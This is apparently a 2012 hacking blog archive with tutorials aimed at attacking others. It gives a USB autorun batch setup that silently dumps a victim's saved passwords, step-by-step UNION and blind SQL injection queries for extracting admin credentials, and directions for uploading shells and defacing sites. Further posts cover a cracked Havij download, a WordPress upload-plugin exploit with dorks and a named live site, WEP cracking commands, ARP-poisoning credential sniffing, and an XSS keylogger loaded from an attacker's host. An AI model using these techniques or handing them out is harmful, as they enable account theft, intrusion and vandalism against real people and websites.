Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Friday, 7 September 2012

How To Make Your Own USB Stealer Steal Password Using Pendrive

| |
1 comments
We Do use Pendrive/Usb Storage Device for different purpose but i am really interested in hacking friends password using USB Storage device.Sounds different but yes it is possible i found a way to perform it .

As we all know that windows stores most of its passwords on daily basis , Such as Msn messenger passwords,Yahoo passwords,Myspace passwords etc.Also you know know that there are many tools to recover Saved passwords,so in this article i will explain you on How to made a USB passwords stealer and steal saved passwords form remote Computer.

Before proceeding Download These Required Material

MessenPass - MessenPass is a password recovery tool that reveals the passwords of the following instant messenger applications:

Mail PassView - Mail PassView is a small password-recovery tool that reveals the passwords and other account details for Outlook express,windows mail,POP3 etc

IE Passview: IE passview is a small program that helps us view stored passwords in Internet explorer.

Protected storage pass viewer(PSPV) - Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer.

Password fox:Password fox is a small program used to view Stored passwords in Mozilla Firefox.


Now Downloaded All the required things come to some real stuff

Note:Kindly disable your antivirus before performing these steps

Steps to create Own Usb Stealer

1.First of all download all 5 tools and copy the executables (.exe( files in your USB i.e. Copy the files mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan


save the Notepad and rename it from

New Text Document.txt to autorun.inf

Now copy the autorun.inf file onto your USB pendrive.


3. Create another Notepad and write the following text onto it.


start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt


save the Notepad and rename it from

New Text Document.txt to launch.bat


Copy the launch.bat file also to your USB drive.

Now your USB Password stealer is ready all you have to do is insert it in your victims computer and a popup will appear, in the popup window select the option (Launch virus scan) as soon as you will click it the following window will appear.


After this you can see saved password in .TXT files

Thanks For Reading

Keep Visiting :- IndiCyborg
Read More

Friday, 31 August 2012

Widgets How To Find Vulnerability On A Website Web Vulnerability

| |
1 comments

As We All know website gets hacked due to vulnerabilities exist on that site so today i will be giving a brief article on finding Web Vulnerability

Now a days Hackers are concentrating a lot of their efforts to find holes in a web application,And This Is the major reason Reason Why Thousands Of Website Getting hacked.If you are a website owner and having a High Page rank and High Traffic then there is a chance that you might be a victim of these Hackers.

Few years back their existed no proper tools search for vulnerability, but now a days there are tons of tools available through which even a newbie can find a vulnerable site and start Hacking.

Common Methods used for Website Hacking

There are lots of methods that can be used to hack a website but most common ones are as follows:

1.SQL Injection
2.XSS(Cross Site Scripting)
3.Remote File Inclusion(RFI)
4.Remote File Upload Vulnerability (Exploits)
5.Local File inclusion(LFI)
6.DDOS attack
7.Google Dorks


And Many More See the Left side Category Box...

I Have Putted My Effort And Written All These types of Attack On my Site With Deatil Tutorial few with examples Please Go Through It If You want to Be A Real Hacker.

Now..
Some Of The Tools that are Mostly used By hacker to hack website Or find Vulnerability on A Website.

Tools Used To Find Website Vulnerability By Hacker.

Acunetix:

Acunetix is one of my favorite tool to find a venerability in any web application It automatically checks your web applications for SQL Injection, XSS & all other web vulnerabilities.

Download Acunetix For Our link

Nessus:

Nessus is the best unix venerability testing tool and among the best to run on windows. Key features of this software include Remote and local file securitychecks a client/server architecture with a GTK graphical interface etc.

Download Nessus

Retina
Retina is another Vulnerability assessment tool,It scans all the hosts on a network and report on any vulnerabilities found.

Download Retina


Metasploit Framework :

The Metasploit Framework is the open source penetration testing framework with the world's largest database of public and tested exploits.

Download Metasploit(For Windows users)

Thanks For Reading

Keep Visitng :- Indicyborg
Read More

Thursday, 30 August 2012

Penetration Tool : Maxsqli syntex maker tool MySQL injection

| |
0 comments

This tool helps hackers/pentesters to create sql syntax. Its also help in waf bypass sql injection method.

This is small program for those who hate typing :D.
it helps you build syntax for MySQL injection.
It supports basic MySQL injection and error based injection.
Just follow help inside the program and you won't have any problems.
If you find bugs then email on : maxonebt4@gmail.com.
Created By Danijel Maxa MaXoNe.Its a virus free program .Tool is compressed with free exe compressor and thats why it's detected as Pak_Generic.

Download : from here

Video Tutorial :


Thanks For Reading Keep Visting :- indicyborg
Read More

Sunday, 26 August 2012

SQL Injection And Defacement For Beginners Complete Tutorial

| |
5 comments

1. What is SQL Injection?

SQL Injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.

2. What is Defacement ?

A website defacement is an attack on a website that changes the visual appearance of the site. These are typically the work of system crackers, who break into a web server and replace the hosted website with one of their own.
 
What do you need before you start with SQL Injection.
 
*You need Admin Finder ( to find admin panel from website )*
*SQL Injection Vulnerable Scanner*

 
Admin Finder:
Download Admin Finder
 
Vulnerable Scanner:
Download ADVANCED HAVIJ Scanner

Dorks for Finding Vulnerable sites!:
Common Dorks

inurl:members.php?id=
inurl:page.php?id=
inurl:login.php?id=
inurl:index.php?id=
inurl:register.php?id=
inurl:staff.php?id=
inurl:detail.php?id=
inurl:view.php?id=


MD5 Hash Crackers Online:

http://www.md5crack.com
http://www.md5decrypter.com
http://www.md5decrypter.co.uk
http://md5.rednoize.com
http://md5decryption.com
http://www.md5decrypter.com
http://passcracking.com
http://md5.my-addr.com/md5_decrypt-md5_c…r_tool.php
http://www.xmd5.org
http://www.md5cracker.com/index.php
http://md5.noisette.ch/index.php
http://md5cracker.org


Text to ASCII Converter:

http://www.mikezilla.com/exp0012.html?ascii=login&hex=%2578&unicode=%26%23120;
http://getyourwebsitehere.com/jswb/text_to_ascii.html


Shell:
 
http://www.kinginfet.net/shells/

Some vulnerable websites
Starting Tutorial:


1. First you need to find vulnerable website.

http://sql-vuln-site.com/index.php?id=15

2. Now you need to find columns.

http://sql-vuln-site.com/index.php?id=15 order by 1-- ( no error )
http://sql-vuln-site.com/index.php?id=15 order by 2-- ( no error )
http://sql-vuln-site.com/index.php?id=15 order by 3-- ( no error )
http://sql-vuln-site.com/index.php?id=15 order by 4-- ( no error )
http://sql-vuln-site.com/index.php?id=15 order by 5-- ( no error )
http://sql-vuln-site.com/index.php?id=15 order by 6-- ( error )


Error’s looks like this:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’39′ at line 1
database query failure- SELECT * FROM texecom_sidemenu WHERE id=’39


3. Now Select columns
Columns is 5


http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT 1,2,3,4,5–
 
4. Finding version.
So if you not go the bold number 1 , 2, 3 , 4 one of them you will try all.
I choose 1


http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT @@version,2,3,4,5–

you got the version like this:
5.0.32-Debian_7etch11-log

5. Finding Tables
http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT table_name,2,3,4,5 from information_schema.tables–
And you will got tables like this:
PRODUCTS , ADMINS , and others
So must be there table by name: admin , users , user , login , client.
 

6. Finding Columns in the Table ADMINS.

http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT column_name,2,3,4,5 from information_schema.columns where table_name=char()–


We found ADMINS table now go to ASCII web and convert ADMINS
You will got this ADMINS
Remove &# and replace ; to ,
Like this: 65,68,77,73,78,83
You put table_name=char(65,68,77,73,78,83)–

http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT column_name,2,3,4,5 from information_schema.columns where table_name=char(65,68,77,73,78,83)–

And you will got the columns in table ADMINS
There need to have columns with names: username and password
 
7. Getting username and password.

Now we put concat(username,0x3a,password) and admins

http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT concat(username,0x3a,password),2,3,4,5 from admins–

( 0x3a is ASCII )
8. Finded username and password
So you found the username and password
if the password is hash like this: 2510c39011c5be704182423e3a695e91
you will need to use MD5 Hash Online Crackers.
If password is not hash you are lucky and now you need to find admin panel.

9. Finding Admin Panel

Open the tool Admin Finder
Put the website in the bellow and click Scan.
So you found admin panel and it looks like this http://sql-vuln-site.com/admin/login.php

You open website and there have Username: Password:
Put username and password what you got.
Done you login in Admin Panel lets upload shell and deface.

10. Uploading Shell and Add Deface

In Admin Panel you will search categories or anything where you can upload a file or picture.
When you found, you will download shell from the website who i tell you before start tutorial so you will try to upload your shell like: r57.php when you upload it you will see the link of the upload and open it like this:

http://sql-vuln-site.com/upload/r57.php

If can’t upload r57.php change it to r57.jpg.php or r57.txt and try!

You need to make a deface page in html and put in the website
So you open the shell,you will found a file index.php and click on it and there you will remove the php code from index and put your html code.
 
Congratulations you deface the website.


Thanks For Reading..

Keep Visiting :- Indicyborg
Read More

Saturday, 25 August 2012

SQL Injection Tool Havij v1.15 Advanced SQL Injection

| |
1 comments

Today i am posting one of the best sql injection tool know as Havij...
Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.
The power of Havij that makes it different from similar tools is its injection methods.
The success rate is more than 95% at injectiong vulnerable targets using Havij.
The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users.
Download It

To download
Cracked Versions :  Click Here


Steps to register

1.Run Havij.exe
2. Once it opens you will see register..
3. Click Register
Make sure you are connected to the internet
4. Under Name:
You write: Cracked@By.Exidous
5. Under File:
You select the folder where you are currently running the Havij program from and select Havij Key
6. Done....

Thanks For Reading.

Keep Visitng :- Indicyborg
Read More

Thursday, 23 August 2012

How To Hack Using Sqli Sql Injection + Sql Injection Complete Tut

| |
0 comments

Yestarday i have posted on article on BLIND SQLI TO HACK WEBSITE Today i am posting basic of hacking that is sqlinjection

As we all know A large number of websites are vulnerable to SQL injection attacks these days.Here i am going to discuss what is SQL injection and how it is done to hack any website. Now-a-days, many noobs find an SQL error in database by automated scanners and just exploit it for fun.Even i haven't used my skills for any bad purpose. This post is about those people who don't know that their website is actually vulnerable to such attack, also i am going to tell you that how its done and how to catch this vulnerability.Due to such vulnerability a Hacker can gain access to your website within a minute.

What is SQL Injection Actually?
SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.
In simple words I must say that hacker injects certain characters in the admin authentication area and gains access as admin.

How is basic SQL injection Accomplished?

Google is very helping in hacking, due to dork technique, Now you will think that what is dork?

Dork: A search enquiry to find a website specific to an attack type etc.

A few dorks are below, which are used to find, vulnerable site:

"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"

These dorks are pasted in the search bar of google.com. and then searched to find the website.

After finding the required target, injection is accomplished, like in the login fields of admin, as password following injections are inserted:

    '1'='1' or'1'(works on 99% of sites best one by me)
    ' or '1'='1
    ' or 'x'='x



In simple words:

Username : Admin
Password : 'or'1'='1


Hit login and you are in, All the sites are not vulnerable and this is just for learning purpose, We are not responsible for any harm or damage caused.

That was just a simple tutorial to give you basic information of SQL injection. There are more advanced techniques too. But some other day i will discuss.

How to check that your website is vulnerable?

This is the most important part in hacking.

Well then, After reading the basics above you might have got the concept of SQL injection. But many tools are also available to scan your website or server for such errors in database, Note, When error occurs it means that website is vulnerable.

First Method:
 

Here is an online scanner:

    http://webhosting.blackoutaio.com/~sqli/

For example, If you want to scan, www.website-wamiq.com then put this in scanner bar:

    inurl:php?=id+site:website-wamiq.com

If you get:

    http://www.website-wamiq.com/product.php?id='3 <== Success





Then it means that website is vulnerable and can be exploited easily by getting the number of colums.
(Note: catid, data, num is also used in addition to id. Simply replace id with your desired value in the dork of scanner.)
Here i got screen shot of a Website with dork "data" instead of "id" vulnerable to the attack it has scanned it overall and here are results:

Second Method:

Here is an automated scanner, Which is for newbies, Just click scan and take rest.
Go to this link to get detailed information on how to find SQL vulnerability in website.
To get Acunetix vulnerability scanner Trial version go here.


Hope, Now you might be aware of SQL injections. Futher information will be posted later.


Thanks For Reading This :p

Keep Visiting :-Indicyborg
Read More

Wednesday, 22 August 2012

Blind Sqli Tutorial To Hack A Website

| |
0 comments

Blind Sqli is one of the most famous technique to hack a website..it is being used by many great hacker over the world to hack many banking websites as well as many popular websites.
Still today also millions of webs sites and vulnerable, can be turn down and credential information can be leaked using this "Blind Sqli" ...

Here is the complete step by step tutorial


Before going into it lets understand what is Blind Sqli?

Blind SQL Injection is used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker.Mean to say The page with the vulnerability may not be one that displays data but will display differently depending on the logical statement injected. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered. There are several tools that can automate these attacks once the location of the vulnerability and the target information has been established.

The steps Begins here:
Suppose That You want to Hack This website with Blind Sqli for that you have to find such type of link shown below..

http://site.com/index.php?id=5


when we execute this, we see some page and articles on that page, pictures
etc…

then when we want to test it for blind sql injection attack


http://www.site.com/index.php?id=5 and 1=1

this is always true and the page loads normally,that's ok.

now the real test
 
http://www.site.com/index.php?id=5 and 1=2

this is false

so if some text, picture or some content is missing on returned page then
that site is vulrnable to blind sql injection.

1) Get the MySQL version

to get the version in blind attack we use substring i.e

http://www.site.com/index.php?id=5 and substring(@@version,1,1)=4

this should return TRUE if the version of MySQL is 4.

replace 4 with 5, and if query return TRUE then the version is 5.

i.e
http://www.site.com/index.php?id=5 and substring(@@version,1,1)=5

2) Test if subselect works
when select don't work then we use subselect

i.e
http://www.site.com/index.php?id=5 and (select 1)=1

if page loads normally then subselects work.
then we gonna see if we have access to mysql.
user

i.e
http://www.site.com/index.php?id=5 and (select 1 from mysql.user limit 0,1)=1

if page loads normally we have access to mysql.user and then later we can

pull some password usign load_file() function and OUTFILE.

3). Check table and column names

This is part when guessing is the best friend
i.e.

http://www.site.com/index.php?id=5 and (select 1 from users limit 0,1)=1

(with limit 0,1 our query here returns 1 row of data, cause subselect
returns only 1 row, this is very important.)

then if the page loads normally without content missing, the table users
exits.

if you get FALSE (some article missing),
just change table name until you
guess the right one :)

let's say that we have found that table name is users,
now what we need is
column name.

the same as table name,
we start guessing. Like i said before try the
common names for columns.

i.e

http://www.site.com/index.php?id=5 and (select substring(concat(1,
password),1,1) from users limit 0,1)=1


if the page loads normally we know that column name is password (if we get
false then try common names or just guess)

here we merge 1 with the column password,
then substring returns the first
character (,1,1)


4). Pull data from database


we found table users i columns username password so we gonna pull
characters from that.

http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>80


ok this here pulls the first character from first user in table users.
substring here returns first character and 1 character in length.
ascii()

converts that 1 character into ascii value
and then compare it with simbol greater then ">" .

so if the ascii char greater then 80, the page loads normally. (TRUE)

we keep trying until we get false.

http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>95


we get TRUE, keep incrementing
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>98


TRUE again, higher


http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>99
FALSE!!!


so the first character in username is char(99). Using the ascii converter

we know that char(99) is letter 'c'.
then let's check the second character.


http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),2,1))>99


Note that i'm changed ,1,1 to ,2,1 to get the second character. (now it
returns the second character, 1 character in lenght)

http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>99

TRUE, the page loads normally, higher.

http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>107

FALSE, lower number.

http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>104

TRUE, higher.

http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>105
FALSE!!!


we know that the second character is char(105) and that is 'i'. We have
'ci' so far

so keep incrementing until you get the end. (when >0 returns false we know
that we have reach the end).

Thankz For Reading

Keep Visiting :- www.indicyborg.blogspot.in
Read More

Monday, 20 August 2012

Trace Any Number In India

| |
0 comments
Hi Readers.Im Back Again.

today im going to tell you awsm trick.
with the help of this trick or method anyone can trace or find address and other info the number.
and this method works only for landlines.im not teaching here how to find or trace mobile numbers :p

So we can start.

First take a landline number of the target.

than goto this link ----> Trace Number


See Image:

and than click on 4th topic telephone number.

See Image:

and type the number and hit enter..

yippeee you got the info.owners name,address of the number..

Thank for reading.

Keep Visiting :- www.indicyborg.blogspot.in
Read More

Wednesday, 15 August 2012

What Is Sniffing How To Perform Sniffing Video Tut

| |
0 comments
Well friends previously i have already posted an article on sniffing using cain
Sniffing With cain


(If you are a fresh viewer then Please go through the first tutorial)

Today i will explain little theory part on sniffing and show a video tutorial on sniffing.


WHAT IS SNIFFING?

Sniffer is piece of tool that captures the traffic flowing into and out of a computer attached to a network.

Sniffing is nothing but the technique of capturing protocols .

A sniffer attack is commonly used to grab logins and passwords that are traveling around on the network (LAN).

Sniffing can be active or passive.

HOW TO SNIFF DATA WHICH ARE CONNECTED THROUGH LAN

See This Video tutorial to gain practical knowledge. 
 
Thankz For Reading.
Happy Hacking :p Keep Visiting :- www.indicyborg.blogspot.in
Read More

How To Do Sniffing Attack With Cain Complete Tutorial

| |
2 comments
Hello Friends And Happy Independence Day 15 August 2012 To All Our Blog Readers..

today i am explaining Sniffing the packet capturing technique. 


A Sniffer is an application or device that can read, monitor, and capture network data exchanges and read network packets. If the packets are not encrypted, a sniffer provides a full view of the data inside the packet.

Using a sniffer, an attacker can do any of the following:
a) Analyze your network and gain information to eventually cause your network to crash or to become corrupted.
b) Read your communications.

UNIX users often smugly assert that the best free security tools support their platform first, and Windows ports are often an afterthought. They are usually right, but Cain & Abel is a glaring exception. This Windows-only password recovery tool handles an enormous variety of tasks.

It can recover passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols.

Sniffing LAN passwords using Cain & Abel.
(Works only for ethernet netwoks)

STEP 1- Run Cain and Abel

STEP 2-Now click on the sniffer tab, right click and select Scan MAC Addresses. You will get a window like this:


STEP 3-Check "All tests" and click OK. Cain & Abel will start scanning the MAC addresses in your subnet. This may take a couple of minutes. Once you have a list of hosts for poisoning, start the sniffer and APR (ARP Poison Routing).

STEP 4-All HTTP connections to the scanned hosts will be redirected to your computer and then from your computer will be sent to the host's computer. When the host will fill the HTTP form, the data will be sent to the server through your computer. Cain & Abel keeps a list of form field names. It will extract the values of the fields with the name matching with that in its database.


To view the captured passwords, click on the "Passwords" tab from the lower tabs and click on HTTP in the Left pane. You can see the captured username and passwords in the right pane along with the URL of the page where the password was input.

Thankz For Reading Keep Visit www.indicyborg.blogspot.in

Read More

Saturday, 11 August 2012

HTC Wildfire S Rooted [Hacks]

| |
0 comments
HTC Wildfire S is all so known as HTC PG76110 which runs on Android 2.3.5 and having 600 MHz ARM 11 processor and chipset of Qulacomm MSM7227. All the users of HTC Wildfire S can now root their phone. To root the device you need to custom recovery installed in the device.


Pre-Requisites

->Unlocked bootloader of HTC Wildfire S
->Custom recovery image

 ->ClockworkMod Recovery 5.0.2.6 (recommended)
 ->Custom recovery image

1.The battery power of the Smartphone must be 80% at least, so that it keeps the device active all through procedure.
2.You must keep backups of all data separately before rooting your device.
3.Disable the firewall and anti-virus software to avoid interruption.
4.Set microSD card to FAT32 file system.

How to flash custom recovery and root your HTC Wildfire S

Step 1: Download the above links on your computer and extract the files.
Step 2: Via USB cable connect your device to your computer and transfer the PG76IMG.zip file to the phone’s SD card.
Step 3: After that detach your Smartphone from the computer and disable the Fastboot on your phone by going to Settings then power.
Step 4: Now switch off the device and reboot it to HBOOT mode by both the Volume Down and Power buttons until the screen appears.
Step 5: Wait for few seconds to detect the recovery image by phone and then as you see the message to start update, use the volume up key to initiate update.
Step 6: Press the Power button to reboot the phone after the installation is complete.
Step 7: Use the USB cable to connect your device after it gets fully booted.
Step 8: From the phone’s SD card delete PG76IMG.zip file and copy the root.zip file.
Step 9: Again unplug the phone and turn off the device.
Step 10: Hold the Volume Down Key and Power buttons until you see HBOOT screen on phone. You must use the Volume keys for navigation and to select use Power button.
Step 11:  In the recovery menu select install zip from sd card then select choose zip from sd card and finally select root.zip file.
Step 12: Confirm by selecting Yes and then the rooting procedure will start by script.
Step 13: When all get finished the go back to the main menu and then select power off.
Step 14: Power on the phone and enjoy the rooted HTC Wildfire S. Superuser, BusyBox, and su binary will also be installed along with it.

Your HTC Wildfire S is successfully rooted and installed with custom recovery. If you counter any error during Superuser app then clear all the data from it and afterwards run the application from the app drawer. It is advised to update su binary to prevent force close error in the app. You may also go for latest version of Superuser from the Google Play Store.
................................................................................
Keep Visiting :- www.indicyborg.blogspot.in
Read More

How to Root and Unroot LG Optimus S LS670 [Hacks]

| |
0 comments
The LG Optimus S is a good smartphone. The device could be considered one of those entry-level Android smartphones. It has been out for quite some time now and it has already received a lot of praise from Internet reviews and first-hand users. They claim that the Optimus S is the best smartphone in its category.

What makes this Android gadget stand out is the fact that it has a sturdy build, its 600 MHz processor is able to handle Android 2.2 very well, and it’s the cheapest among the first Sprint ID smartphones.
Since it is a Sprint ID smartphone, the LG Optimus S contains all the Sprint ID bloatware. Most of the time, the software is not really useful and many of you wish that network providers like Sprint didn’t preload such apps into their phones. But, since that is not how it works in the real world, then we just have to find some ways to remove the bloatware ourselves.
Rooting an Android device is typically the first step in removing bloatware. This process will give users more control over the device. So, if you are planning to root your LG Optimus S to get rid of Sprint ID bloatware, continue reading to know how.

Requirements

Download and install the .net Framework. Part of this utility software is needed by the rooting application. Get the .net Framework here.

 The rooting application will also need the Visual C++ 2008 Redistribute Package. You can get this here.

This process will need a Windows PC which runs either Windows Vista or Windows 7.
    It is also best to have a fully charged battery before you perform this process.

Instructions
 1.Download the rooting application from here
 2.Unzip the downloaded file to have access to the main rooting application.
 3.Download and install the USB driver for the device from here. If you have successfully connected the device to your PC before, you don’t need to do this.
 4.Enable USB debugging in the Optimus S. To do this, just follow this path Settings > Applications > Development and check the box for USB Debugging.
 5.Connect the device to your PC via USB cable.
 6.Open the notifications window on the device and make sure “USB debugging connected” is listed under “Ongoing”.
 7.Go to the folder where you unzipped the rooting files. Right click on “Gingersnap.exe” and then choose “Run as administrator”.
 8.Click on the Root button to complete the rooting process. And, if you just came back here to Unroot the Optimus S, then feel free to click the Unroot button.

You can now remove the bloatware on your Optimus S to free up some space and get rid of unwanted stuff. Doing this one, though, is a totally different topic. But, then again, you’re already one step closer since the device is already rooted. And, not just that–you can now do more things with your Optimus S like probably installing CyanogenMod.
...............................................................................
Keep Visiting Us :- www.indicyborg.blogspot.in
Read More

Friday, 10 August 2012

Wireless Wi-Fi Modem Network Hacking Complete Tutorial

| |
2 comments

Many of the friends ask me about how to hack wifi network .so here is the tutorial that will explain how to hack wifi.
In our daily life some time our laptop catching so many wi-fi signals but none of them is accessible..and we think “I wish I could some how break the password and access free internet”.
if you are thinking like that than this tutorial will definitely help you in cracking password of wi-fi network for free internet.
 
Tutorial on hacking wi-fi Network

First of all you need to scan for available wireless networks.

you can use“NetStumbler” or "Kismet" for Windows and Linux and KisMac for Mac
Below is a screenshot of NetStumbler.. It will show you a list of all the wireless access points in your range.

It’ll also show how the Wi-fi network is secured..

Now the main par comes The two most common encryption types are:
 
1) WEP (Wire Equivalent Privacy )

2) WAP(Wireless Application Protocol)



WEP allows a hacker to crack a WEP key easily whereas WAP is currently the most secure and best option to secure a wi-fi network

It can’t be easily cracked as WEP because the only way to retreive a WAP key is to use a brute-force attack or dictionary atack.
 
How to Crack WEP

This is the practically tested way to hack wi-fi network.

To crack WEP we will be using Live Linux distribution called BackTrack to crack WEP.

BackTrack have lots of preinstalled softwares but for this time

The tools we will be using on Backtrack are:

a)Kismet – a wireless network detector
b)airodump – captures packets from a wireless router
c)aireplay – forges ARP requests
d)aircrack – decrypts the WEP keys

 
Follow the steps One by One

1) First of all we have to find a wireless access point along with its bssid, essid and channel number. To do this we will run kismet by opening up the terminal and typing in kismet. It may ask you for the appropriate adapter which in my case is ath0. You can see your device’s name by typing in the command iwconfig.


2) To be able to do some of the later things, your wireless adapter must be put into monitor mode. Kismet automatically does this and as long as you keep it open, your wireless adapter will stay in monitor mode.


3) In kismet you will see the flags Y/N/0. Each one stands for a different type of encryption. In our case we will be looking for access points with the WEP encryption. Y=WEP N=OPEN 0=OTHER(usually WAP).


4) Once you find an access point, open a text document and paste in the networks broadcast name (essid), its mac address (bssid) and its channel number. To get the above information, use the arrow keys to select an access point and hit to get more information about it.

5) The next step is to start collecting data from the access point with airodump. Open up a new terminal and start airodump by typing in the command:

airodump-ng -c [channel#] -w [filename] –bssid [bssid] [device]

In the above command airodump-ng starts the program, the channel of your access point goes after -c , the file you wish to output the data goes after -w , and the MAC address of the access point goes after –bssid. The command ends with the device name. Make sure to leave out the brackets.


6) Leave the above running and open another terminal. Next we will generate some fake packets to the target access point so that the speed of the data output will increase. Put in the following command:

aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:55:66 -e [essid] [device]

In the above command we are using the airplay-ng program. The -1 tells the program the specific attack we wish to use which in this case is fake authentication with the access point. The 0 cites the delay between attacks, -a is the MAC address of the target access point, -h is your wireless adapters MAC address, -e is the name (essid) of the target access point, and the command ends with the your wireless adapters device name.


7) Now, we will force the target access point to send out a huge amount of packets that we will be able to take advantage of by using them to attempt to crack the WEP key. Once the following command is executed, check your airodump-ng terminal and you should see the ARP packet count to start to increase. The command is:

aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:5:66 [device]

In this command, the -3 tells the program the specific type of attack which in this case is packet injection, -b is the MAC address of the target access point, -h is your wireless adapters MAC address, and the wireless adapter device name goes at the end.
Once you have collected around 50k-500k packets, you may begin the attempt to break the WEP key. The command to begin the cracking process is:

aircrack-ng -a 1 -b [bssid] -n 128 [filename].ivs

In this command the -a 1 forces the program into the WEP attack mode, the -b is the targets MAC address, and the -n 128 tells the program the WEP key length. If you don’t know the -n , then leave it out. This should crack the WEP key within seconds. The more packets you capture, the bigger chance you have of cracking the WEP key.

Now you have learn how to hack wi-fi network.
This is the most practically way to hack wi-fi network working genuinely.Always put your try and i am sure this tutorial is helpful to you.

please share if if you like and keep viewing www.Indicyborg.blogspot.in thankyou form admin.:)
Read More

Quick Tips About Wordpress Defacing

| |
1 comments

Wordpress Defacing without uploading Shell

usually after gaining admin acess on wordpress website we upload shell on website, its takes some extra time, even you can deface wordpress's index page without uploading shell !
Goto wordpress dashboard than theme editor and you'll see 2-3 thmes there like twenty ten and twenly eleven.
Look there for active Theme on That website and edit index.php of that theme. and you'll see your deface pages on website's home Page.


Bypassing Permission Denided for index.php in wordpress

sometimes after upload shell on wordpress website when you'll try to replace index.php's socurce code in public_html/ directory with you deface page, it will show error like permission denided, can't write in file etc, and sometimes permission change dones't work, then follow the same method whic is give above, change active theme's index.php file and home will chnage with your deface page.

Simple :)

Keep Visiting www.indicyborg.blogspot.in

Read More

Two factor Authentication on wordpress

| |
0 comments
What is two factor authentication ?

Two –Factor authentication is commonly found in electronic computer authentication, where basic authentication is the process of a requesting entity presenting some evidence of its identity to a second entity. Two-factor authentication seeks to decrease the probability that the requestor is presenting false evidence of its identity .

Duo Security Overview

Duo Security provides two-factor authentication as a service built to prevent account takeover and online fraud. Protect remote access with drop-in support for most VPNs and Unix, or add login or transaction verification to any website with Duo's powerful web APIs.

Benefits using Duo Security

Compliance: Easily meet federal and industry regulations for strong authentication such as PCI DSS and HIPAA.
Cost-effective: No hardware to deploy and manage, and self- service user enrollment to reduce administrative burden.
Scalable: Duo leverages the cloud to rapidly scale as your user base grows, removing the need for onsite infrastructure.
Compatible: Integrates seamlessly with existing technology investments and end-user smartphone platforms.

The content of this Article “Two-Factor Authentication on wordpress’’ is for public to know more about it and information is provided by various sources.
Read More

Wordpress Exploit : 10,000+ Websites are Vunerable For this attack

| |
11 comments
This venerability is known as WordPress Easy Comment Upload Venerability.
Google dorks:


"inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php"
/wp-content/plugins/easy-comment-uploads/upload-form.php
Index of /wp-content/plugins/easy-comment-uploads


Open Google and enetr any dork which Given,
Now selct any website
and goto this url site.com/wp-content/plugins/easy-comment-uploads/upload-form.php
You'll Got Upload Option here :)
Now Upload Your Deface ....
and check it here site.com/wp-content/uploads/2011/05/yourfilehere


Note :- In some websites you can Upload your deface in txt on only ... and you can upload shell in 50% sites only ... upload shell in image format ex; shell.asp;.jpg

DEMO:
http://www.findthepearl.com/
http://www.findthepearl.com/wp-content/plugins/easy-comment-uploads/



Happy Hacking :p
Read More

How to Hack A Website using Xss Attack Keylogging

| |
16 comments
As we all know that Key logger is a program that allow us to view the key pressed by user.In this Tutorial we will learn how to use keylogger on a website to capture all the keystrokes on that page.
like i said previously Xss Attack or Cross site scripting is simple but it can be used in deadlier way

this tutorial only works on Xssed sites ...

As we know that we can run our own scripts on those website which have XSS vulnerability. We use our Keylogging script on XSS vulnerable website.

To perform this Attack we need three thigs

Xssed Site(That is a xss vulnerable site)

Webhosting sevice (Free)

Keylogging Script


First Of all Download the script from the below link

Download Script

Now create an account in any free hosting web host that supports PHP. PHP will be used to write keystrokes on a text file.

Now open Logger.js and change the URL of your script. Default URL is http://yourwebsite.com just Change it to your hosting URl.


Now host all these scripts on your web host.

Now find a XSS vulnerable website website and include script link like this:
 
http://targetwebsite.com/search.php?q="<script src="http://yourwebsite.com/keylogger.js"></script>

